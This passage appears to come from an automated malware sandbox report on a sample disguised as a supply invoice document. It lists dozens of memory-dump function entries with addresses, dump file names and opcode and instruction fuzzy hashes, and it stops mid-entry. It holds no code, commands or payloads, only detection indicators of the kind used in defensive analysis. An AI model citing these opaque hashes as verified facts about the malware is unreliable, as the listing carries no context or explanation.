                                                                                                                                • Opcode Fuzzy Hash: cfe855aa5370e709d3beaf8d0a0824e85895befd2a0058a9eb758e5aacecaf96
                                                                                                                                • Instruction Fuzzy Hash: 5E410875A00605EFDB25CF98C980AAAFBF4FF58704B10496DE656D7652D330EA44CF90
                                                                                                                                Function 0170262C Relevance: .1, Instructions: 119COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000B.00000002.2300679134.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_11_2_16d0000_z1SupplyInvoiceCM60916_Doc.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: ecb7a6e504b798e8137665428c36c57f92f7884d5552924955895cccc628afed
                                                                                                                                • Instruction ID: 60f22c6ef5e23498fec39b0927e95c9ea72d6896849194224703a1213ecd7bff
                                                                                                                                • Opcode Fuzzy Hash: ecb7a6e504b798e8137665428c36c57f92f7884d5552924955895cccc628afed
                                                                                                                                • Instruction Fuzzy Hash: 7441B0B2541705DFC722EF28C908665F7F1FF58320F1081ADD6069B6E6DB30A941CB51
                                                                                                                                Function 0173C8F9 Relevance: .1, Instructions: 116COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000B.00000002.2300679134.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_11_2_16d0000_z1SupplyInvoiceCM60916_Doc.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: da1f94e8799ed9d49e905c0a2a7f40a0430a3282423b300ec0ec0ef628e245ce
                                                                                                                                • Instruction ID: 6621d2dfbe5a290b8fec52d298ea3a63c9ffb366a263b5bfc5830400a797aa42
                                                                                                                                • Opcode Fuzzy Hash: da1f94e8799ed9d49e905c0a2a7f40a0430a3282423b300ec0ec0ef628e245ce
                                                                                                                                • Instruction Fuzzy Hash: 213177B2A00349DFDB12CFA8C440799FBF0EB49724F2181AED519EB252D3729902CB90
                                                                                                                                Function 016F80A0 Relevance: .1, Instructions: 111COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000B.00000002.2300679134.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_11_2_16d0000_z1SupplyInvoiceCM60916_Doc.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: aa523ebbe99e48b976d23d8807100d0404387bcffcab308cf61392271d3b5daa
                                                                                                                                • Instruction ID: ba8a9c630f9d0d5398ac161bd90bd31845c9b1e40d3aeb858d84804c1b3e792d
                                                                                                                                • Opcode Fuzzy Hash: aa523ebbe99e48b976d23d8807100d0404387bcffcab308cf61392271d3b5daa
                                                                                                                                • Instruction Fuzzy Hash: 8A41D071A05617EFDB01DF18CC806A8F7B9BB44761F2083ADDA15A7380DB34ED428B90
                                                                                                                                Function 017805A7 Relevance: .1, Instructions: 111COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000B.00000002.2300679134.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_11_2_16d0000_z1SupplyInvoiceCM60916_Doc.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: dbe91c31ad5c208af229998b7e1838babbac8871100f66966e59a1d49cbbdf10
                                                                                                                                • Instruction ID: cc23b8f9b23250c1ac2af33eafdd69ac7ac337564e82482606a695a387d3ec2f
                                                                                                                                • Opcode Fuzzy Hash: dbe91c31ad5c208af229998b7e1838babbac8871100f66966e59a1d49cbbdf10
                                                                                                                                • Instruction Fuzzy Hash: 1E41D0726446429FD320EF6CC840A7AF7E9FFC8700F140A29F99487680E730E918C7A6
                                                                                                                                Function 01704859 Relevance: .1, Instructions: 111COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000B.00000002.2300679134.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_11_2_16d0000_z1SupplyInvoiceCM60916_Doc.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: b2ca70540f4704f9b58942d0e5a28a36c2727c5aed78fbce40d0212f9af793f8
                                                                                                                                • Instruction ID: 5624b5253ed06127d328fcd403a53fd289ff00429f95c1a506522ca08880ecd1
                                                                                                                                • Opcode Fuzzy Hash: b2ca70540f4704f9b58942d0e5a28a36c2727c5aed78fbce40d0212f9af793f8
                                                                                                                                • Instruction Fuzzy Hash: C241AE70210302CBD726DF2CD888B2AFBE9AF80364F14487DEA568B2E5DB30D901CB51
                                                                                                                                Function 016F8B50 Relevance: .1, Instructions: 111COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000B.00000002.2300679134.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_11_2_16d0000_z1SupplyInvoiceCM60916_Doc.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: b583d283c2476cb9ea3d2d2ea7a653ff1cc0a3ba9b2f695b003d62484d98fba2
                                                                                                                                • Instruction ID: 5bff359f2b9fe6454adca96e0014ae26b2e6b150ccc4187ebc356bfe48892e94
                                                                                                                                • Opcode Fuzzy Hash: b583d283c2476cb9ea3d2d2ea7a653ff1cc0a3ba9b2f695b003d62484d98fba2
                                                                                                                                • Instruction Fuzzy Hash: AC418271A01609CFCB15CF69CD80A9DF7F6FF98320B1486AED666A7390D734A941CB40
                                                                                                                                Function 017102E1 Relevance: .1, Instructions: 106COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000B.00000002.2300679134.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_11_2_16d0000_z1SupplyInvoiceCM60916_Doc.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: d45b632d2c88e3b1d2b0a33d4d0818ae25320c4cce4feeb98528bfb7bef810ab
                                                                                                                                • Instruction ID: 62aa96b89dbe69484dc105170509e305ee5c9b1ee0bda25a8be0ec7357ff8fd9
                                                                                                                                • Opcode Fuzzy Hash: d45b632d2c88e3b1d2b0a33d4d0818ae25320c4cce4feeb98528bfb7bef810ab
                                                                                                                                • Instruction Fuzzy Hash: 03311631A04244AFDB228B6CCC48B9BFFE9AF15350F0445A9F855D739AD7749984CBA0
                                                                                                                                Function 017AE3DB Relevance: .1, Instructions: 105COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000B.00000002.2300679134.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_11_2_16d0000_z1SupplyInvoiceCM60916_Doc.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 9ab429784023f3b9002faacc53ff25f8b9a26f145022ad0ba776648e8a3ea5d7
                                                                                                                                • Instruction ID: 1b2d66c3a37c3ef5be813fb67de47bc2cb1ddd26624899c932f7369cb302dee5
                                                                                                                                • Opcode Fuzzy Hash: 9ab429784023f3b9002faacc53ff25f8b9a26f145022ad0ba776648e8a3ea5d7
                                                                                                                                • Instruction Fuzzy Hash: 9A31C835740716ABD7229F598C44FABBAA8EB99B50F400028F600AB385DAA4DC01D7E0
                                                                                                                                Function 017B4B4B Relevance: .1, Instructions: 104COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000B.00000002.2300679134.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_11_2_16d0000_z1SupplyInvoiceCM60916_Doc.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 53c1f4845100bdfbb39f4625c03daf6740e6fc1608fa1a335f7f8b0ff42a9693
                                                                                                                                • Instruction ID: 15d6fe99b93c27b86b65dda2307fa1a52913bc63cb5a10273295b92c89f82d77
                                                                                                                                • Opcode Fuzzy Hash: 53c1f4845100bdfbb39f4625c03daf6740e6fc1608fa1a335f7f8b0ff42a9693
                                                                                                                                • Instruction Fuzzy Hash: 7E318D326052018FC721DF1DD8C4FA6B7E6FB84760F1A846EE9978B256DB30A840CB91
                                                                                                                                Function 01704260 Relevance: .1, Instructions: 102COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000B.00000002.2300679134.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_11_2_16d0000_z1SupplyInvoiceCM60916_Doc.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 1f12f0e313471fe8d7f1b1a8d3f7409f144f3307dc92f55e257957a053436319
                                                                                                                                • Instruction ID: 9c22a12bbaf92b924fc3b15da8292cb5ca799940ef98b45f97dc176ffcc7d8a1
                                                                                                                                • Opcode Fuzzy Hash: 1f12f0e313471fe8d7f1b1a8d3f7409f144f3307dc92f55e257957a053436319
                                                                                                                                • Instruction Fuzzy Hash: BB41AF71204B45DFD722CF68C884B96FBE9AF49714F01886DEA5A8B290C770E804CB50
                                                                                                                                Function 017B4BB0 Relevance: .1, Instructions: 101COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000B.00000002.2300679134.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_11_2_16d0000_z1SupplyInvoiceCM60916_Doc.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 4ba3081ea4424729cedfd0cdcf4c4a19c6b02430fea2487f30709ee72efb4d28
                                                                                                                                • Instruction ID: 16a9e617d3da0dec149a98bbd746ad32213e1b20ed6da8b01a9199e04b6826b5
                                                                                                                                • Opcode Fuzzy Hash: 4ba3081ea4424729cedfd0cdcf4c4a19c6b02430fea2487f30709ee72efb4d28
                                                                                                                                • Instruction Fuzzy Hash: D6317C716042019FD720DF2CC8C4BAAB7E5FB84B20F15456DF9969B296E730E904CB91
                                                                                                                                Function 0177EB1D Relevance: .1, Instructions: 100COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000B.00000002.2300679134.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_11_2_16d0000_z1SupplyInvoiceCM60916_Doc.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 769140c02bdce56aba7eb11d6a4bc9426938bda147ff80f490e3a8e9ce48332d
                                                                                                                                • Instruction ID: 4c48e416eb26355c187ec38201a1ffe81feb8e0d4476077e3c8d8704704e76b5
                                                                                                                                • Opcode Fuzzy Hash: 769140c02bdce56aba7eb11d6a4bc9426938bda147ff80f490e3a8e9ce48332d
                                                                                                                                • Instruction Fuzzy Hash: B631A1713416829BFB26576D8948F35FFD9BB41B44F2D00E0AB859B6E2DF28D881C230
                                                                                                                                Function 017C61C3 Relevance: .1, Instructions: 97COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000B.00000002.2300679134.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_11_2_16d0000_z1SupplyInvoiceCM60916_Doc.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 87bb6e637fd346f7b629b39936508c20545e8b274cdd7bc7a44229ad1fbee950
                                                                                                                                • Instruction ID: 44146c718c8deb95db2b3927b0bcf37466b59fa4c0189c077c7216e3cb3f8425
                                                                                                                                • Opcode Fuzzy Hash: 87bb6e637fd346f7b629b39936508c20545e8b274cdd7bc7a44229ad1fbee950
                                                                                                                                • Instruction Fuzzy Hash: E931AF76A0021AABDB15DF98C884BAEF7B6EB48B40F45416DF901EB244D770ED01CBA4
                                                                                                                                Function 017A483A Relevance: .1, Instructions: 96COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000B.00000002.2300679134.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_11_2_16d0000_z1SupplyInvoiceCM60916_Doc.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: e04f51fc0ea8d7d0d1ed649f12980a08ab65a1e5402c96545f53aaae80eb7a1c
                                                                                                                                • Instruction ID: f49395bae8d5676f3fc0b43840aa1bf335ab63708302e7c4df67a25930b247f7
                                                                                                                                • Opcode Fuzzy Hash: e04f51fc0ea8d7d0d1ed649f12980a08ab65a1e5402c96545f53aaae80eb7a1c
                                                                                                                                • Instruction Fuzzy Hash: 3B317236A4012DABCB21DF58DC88BDEBBF9AB98310F1401A5A509A7254CB71DE918F90
                                                                                                                                Function 0172EB20 Relevance: .1, Instructions: 96COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000B.00000002.2300679134.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_11_2_16d0000_z1SupplyInvoiceCM60916_Doc.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 448414b50819365559c43ab3d535fd01d4248f901128de4604af32bac9027b9d
                                                                                                                                • Instruction ID: d4d7ebb1fa2ead38979948be5100655ded86b68d55d3b687f390b2492fbd36e4
                                                                                                                                • Opcode Fuzzy Hash: 448414b50819365559c43ab3d535fd01d4248f901128de4604af32bac9027b9d
                                                                                                                                • Instruction Fuzzy Hash: AC31D332E00225AFDB21DFA9CC80EAEFBF8EF08750F014465E956E7250D7709E418BA0
                                                                                                                                Function 017C60B8 Relevance: .1, Instructions: 95COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000B.00000002.2300679134.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_11_2_16d0000_z1SupplyInvoiceCM60916_Doc.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 1ffd5bd1df5d2a194e24389769a6c1368bba992c450eba9892feb442e0b458f7
                                                                                                                                • Instruction ID: 1b17df4eff24ed7411cd9c2fdb555f880ed406014193b82af1cd10b5a8cd5550
                                                                                                                                • Opcode Fuzzy Hash: 1ffd5bd1df5d2a194e24389769a6c1368bba992c450eba9892feb442e0b458f7
                                                                                                                                • Instruction Fuzzy Hash: F231B471B40606AFDB129F99C890B7BF7B9AF84B55F11406DF506EB346DA30DD018B90
                                                                                                                                Function 017007AF Relevance: .1, Instructions: 95COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000B.00000002.2300679134.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_11_2_16d0000_z1SupplyInvoiceCM60916_Doc.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 1b79470889cb7fc16d241777fc6b70a0d85abf700dd5da6c8d3df82ba13393e1
                                                                                                                                • Instruction ID: ca90f5283f783ef3bea8e046d8401ff46fb8fc850f9c4b40bf7b0c6fc9bd2e6d
                                                                                                                                • Opcode Fuzzy Hash: 1b79470889cb7fc16d241777fc6b70a0d85abf700dd5da6c8d3df82ba13393e1
                                                                                                                                • Instruction Fuzzy Hash: 0A31DC32A44712DBC713DE288884A6BFBE6BB942A0F01452DFD59A7290EA30DD1187E1
                                                                                                                                Function 01708550 Relevance: .1, Instructions: 94COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000B.00000002.2300679134.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_11_2_16d0000_z1SupplyInvoiceCM60916_Doc.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 1e68c698f4245ea60afedc44f8683a58d06c15d382ce83a14cbdab9dc93a57cb
                                                                                                                                • Instruction ID: 426084456ea8a553bd682defa08a7d780596f5d57d373738ff1e92847f168431
                                                                                                                                • Opcode Fuzzy Hash: 1e68c698f4245ea60afedc44f8683a58d06c15d382ce83a14cbdab9dc93a57cb
                                                                                                                                • Instruction Fuzzy Hash: F4318C71A09302CFE761CF19C840B2AFBE9FB98700F15496EE9849B391D771E844CB92
                                                                                                                                Function 0173A6C7 Relevance: .1, Instructions: 92COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000B.00000002.2300679134.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_11_2_16d0000_z1SupplyInvoiceCM60916_Doc.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 0db01105071e305578d35fd0a84dce3d89a7587bc94cbde32e7e57e396344d18
                                                                                                                                • Instruction ID: 556a88ca7cea968400253fc7b7cda2a07514b2d17c66015aeceff586a559a145
                                                                                                                                • Opcode Fuzzy Hash: 0db01105071e305578d35fd0a84dce3d89a7587bc94cbde32e7e57e396344d18
                                                                                                                                • Instruction Fuzzy Hash: 7F3128B2B00B01AFE765CF69DD81B57FBF8AB48A50F04092DA59AC3651E730E9008B60
                                                                                                                                Function 017AEBD0 Relevance: .1, Instructions: 91COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000B.00000002.2300679134.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_11_2_16d0000_z1SupplyInvoiceCM60916_Doc.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: c6bf765d6ea8ce651062690c9417a745540e21ff73a8df44b7b272e18c7ccda1
                                                                                                                                • Instruction ID: 6dc8f38de8f68e1420e8b40b64e5f2ce8abc7bf179a3317591f9abd0b6cecf56
                                                                                                                                • Opcode Fuzzy Hash: c6bf765d6ea8ce651062690c9417a745540e21ff73a8df44b7b272e18c7ccda1
                                                                                                                                • Instruction Fuzzy Hash: BC317AB16053028FCB11DF19C58495AFBF1FFC9618F444AAEF4889B355E730A984CB92
                                                                                                                                Function 0172438F Relevance: .1, Instructions: 89COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000B.00000002.2300679134.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_11_2_16d0000_z1SupplyInvoiceCM60916_Doc.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 6c16cd26ac97f7f0a7cac69e6ddbba36658de4d86435767baaa7b4b65bed09e0
                                                                                                                                • Instruction ID: 6deaf1b6a09a359d5fad051ffa2882309ae43fac01f54ba07e25ca0b50ed82f7
                                                                                                                                • Opcode Fuzzy Hash: 6c16cd26ac97f7f0a7cac69e6ddbba36658de4d86435767baaa7b4b65bed09e0
                                                                                                                                • Instruction Fuzzy Hash: E931F172B006169FD720EFA8C884A6EFBF9AF94304F008429D506D7258E730ED46CB90
                                                                                                                                Function 016FCB7E Relevance: .1, Instructions: 89COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000B.00000002.2300679134.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_11_2_16d0000_z1SupplyInvoiceCM60916_Doc.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 8cd4161f5b4d08ac4698b36444b06603346f514182f58bb0feca1d395408faf4
                                                                                                                                • Instruction ID: dd871babd243dd7b6ecd99f1e086ff199c29b7e5520d1668fc58186971e64131
                                                                                                                                • Opcode Fuzzy Hash: 8cd4161f5b4d08ac4698b36444b06603346f514182f58bb0feca1d395408faf4
                                                                                                                                • Instruction Fuzzy Hash: 2D210436E4025AAADB109BB98811BAFFBB5AF14740F0581799E15E7340E6B0D90187A0
                                                                                                                                Function 016FC156 Relevance: .1, Instructions: 88COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000B.00000002.2300679134.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_11_2_16d0000_z1SupplyInvoiceCM60916_Doc.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 4cce7b3cc84c40b1a1e924ed5d185b6650520270a037b2f0ec71fed10ac529ab
                                                                                                                                • Instruction ID: 703da18acaf4b05147602c68c1551375cc4c21de8a525bd8f4fbb04869444165
                                                                                                                                • Opcode Fuzzy Hash: 4cce7b3cc84c40b1a1e924ed5d185b6650520270a037b2f0ec71fed10ac529ab
                                                                                                                                • Instruction Fuzzy Hash: 2E314B715002018BD731AF6CCC44BA9F7B4EF50314F54C5ADED859B38AEAB4D982CBA0
                                                                                                                                Function 017BC3CD Relevance: .1, Instructions: 88COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000B.00000002.2300679134.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_11_2_16d0000_z1SupplyInvoiceCM60916_Doc.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 7f3ac7f511b12b6545c220c591282cbbe50732f4b841637f95eeaa606406b8f4
                                                                                                                                • Instruction ID: d78ccd86c5261e1914f38b8bcfb951e459c51d5ae2b9680dcad73a80904b8ab2
                                                                                                                                • Opcode Fuzzy Hash: 7f3ac7f511b12b6545c220c591282cbbe50732f4b841637f95eeaa606406b8f4
                                                                                                                                • Instruction Fuzzy Hash: FC212D3A60065677CB16ABD58C44BFAFFB5EF40710F40C41AFA958B591E738DA40C360
                                                                                                                                Function 016FE420 Relevance: .1, Instructions: 88COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000B.00000002.2300679134.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_11_2_16d0000_z1SupplyInvoiceCM60916_Doc.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 5988ef6bebbc2c72ea065a59a24285611388192311357313bc558426525fd15c
                                                                                                                                • Instruction ID: 90df28cedf60917f9a7ae0020c424ca71638b42fbe8c0088c588ebd38f109f47
                                                                                                                                • Opcode Fuzzy Hash: 5988ef6bebbc2c72ea065a59a24285611388192311357313bc558426525fd15c
                                                                                                                                • Instruction Fuzzy Hash: 4931F731A0152C9BDB31DF18CC45FEEBBB9EB15750F0200A9E745A72A0E775AE858F90
                                                                                                                                Function 01734588 Relevance: .1, Instructions: 87COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000B.00000002.2300679134.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_11_2_16d0000_z1SupplyInvoiceCM60916_Doc.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 889ecffd1a06a090bd79871a4c0fdf01ee42b751b4f666e31dccfc06bb2b9632
                                                                                                                                • Instruction ID: eee6649149cd97b3b7baffa0cfb13a63afa8f9ba77a75a8e6b01a331dead9b15
                                                                                                                                • Opcode Fuzzy Hash: 889ecffd1a06a090bd79871a4c0fdf01ee42b751b4f666e31dccfc06bb2b9632
                                                                                                                                • Instruction Fuzzy Hash: 70218675A00609EFCB19CF58C984A8EFBB5FF88714F1080A5EE169F246D671DE05DB90
                                                                                                                                Function 017344B0 Relevance: .1, Instructions: 87COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000B.00000002.2300679134.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_11_2_16d0000_z1SupplyInvoiceCM60916_Doc.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 87473dd4e20a2cc437f601586c663c47e3974136390e09b9b6071ce06d999901
                                                                                                                                • Instruction ID: ab8e650795b6e5cb98f5c5696e0c36bb8557d7112f8f51a291e6ec1e13a28c81
                                                                                                                                • Opcode Fuzzy Hash: 87473dd4e20a2cc437f601586c663c47e3974136390e09b9b6071ce06d999901
                                                                                                                                • Instruction Fuzzy Hash: 7321B472A047459BCB26DF18C440B6BFBE4FB88760F104559F9569B685D730DA01CB91
                                                                                                                                Function 016FE388 Relevance: .1, Instructions: 86COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000B.00000002.2300679134.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_11_2_16d0000_z1SupplyInvoiceCM60916_Doc.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 0cf2ef89ce765565c41e30a718174bbd4c2b265194fcbe27392bd3351cdfdb09
